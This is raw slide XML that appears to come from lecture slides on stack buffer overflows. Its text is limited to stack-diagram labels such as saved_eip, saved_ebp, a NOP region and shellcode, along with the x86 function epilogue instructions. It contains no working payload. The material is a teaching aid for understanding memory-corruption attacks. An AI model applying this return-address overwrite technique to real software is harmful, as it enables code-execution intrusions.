          <p:cNvPr id="1173518" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="21145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saved_eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173519" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="12001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argc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173520" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1485900"/>
            <a:ext cx="2057400" cy="6286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argv</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173521" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="50292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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173522" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="531495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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173523" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="56007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pc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173524" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="1200150"/>
            <a:ext cx="152400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 66667"/>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73525" name="AutoShape 21"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="2114550"/>
            <a:ext cx="152400" cy="2171700"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 158333"/>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73526" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="24003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eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>saved_ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173527" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="15464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main()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173528" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="30323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func()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1173529" name="AutoShape 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1173523" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2606676" y="4557921"/>
            <a:ext cx="3870324" cy="1185654"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173532" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="42862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i="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>free </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173533" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001000" y="2400300"/>
            <a:ext cx="533400" cy="285750"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1173536" name="AutoShape 32"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="3114675"/>
            <a:ext cx="1588" cy="2343150"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -49200005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1173537" name="AutoShape 33"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1173521" idx="1"/>
            <a:endCxn id="1173511" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="3114675"/>
            <a:ext cx="1588" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14400000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>main() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4102894"/>
            <a:ext cx="1912703" cy="338554"/>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dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228602" y="4388644"/>
            <a:ext cx="2378075"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dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4731544"/>
            <a:ext cx="2362200"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a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89583425"/>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5557" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1085850"/>
            <a:ext cx="2057400" cy="3200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1175558" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="26860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&amp;shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175559" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="29718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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175560" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="37147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nop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175561" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="40005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int i</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7404100" y="3333750"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1175563" name="Oval 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2880"/>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75564" name="Oval 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2976"/>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75565" name="Oval 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="3072"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175566" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="21145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saved_eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175567" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="12001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argc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175568" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1485900"/>
            <a:ext cx="2057400" cy="6286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argv</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175569" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="50292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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175570" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="531495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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175571" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="56007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pc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175572" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="1200150"/>
            <a:ext cx="152400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 66667"/>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75573" name="AutoShape 21"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="2114550"/>
            <a:ext cx="152400" cy="2171700"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 158333"/>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75574" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="24003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eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>saved_ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175575" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="15464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main()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175576" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="30323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func()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1175577" name="AutoShape 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1175571" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2590800" y="4931599"/>
            <a:ext cx="3886200" cy="811976"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1175578" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1175570" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="4953000" y="2686051"/>
            <a:ext cx="1524000" cy="2771775"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175580" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="42862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i="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>free </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175581" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001000" y="2400300"/>
            <a:ext cx="533400" cy="285750"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1175584" name="AutoShape 32"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1175569" idx="1"/>
            <a:endCxn id="1175558" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2828925"/>
            <a:ext cx="1588" cy="2343150"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14400000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>main() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4102894"/>
            <a:ext cx="1912703" cy="338554"/>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dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228602" y="4388644"/>
            <a:ext cx="2378075"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dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4731544"/>
            <a:ext cx="2362200"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a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1242940390"/>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05" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1085850"/>
            <a:ext cx="2057400" cy="3200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1177606" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="26860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&amp;shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177607" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="29718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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177608" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="37147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nop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177609" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="40005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int i</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7404100" y="3333750"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1177611" name="Oval 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
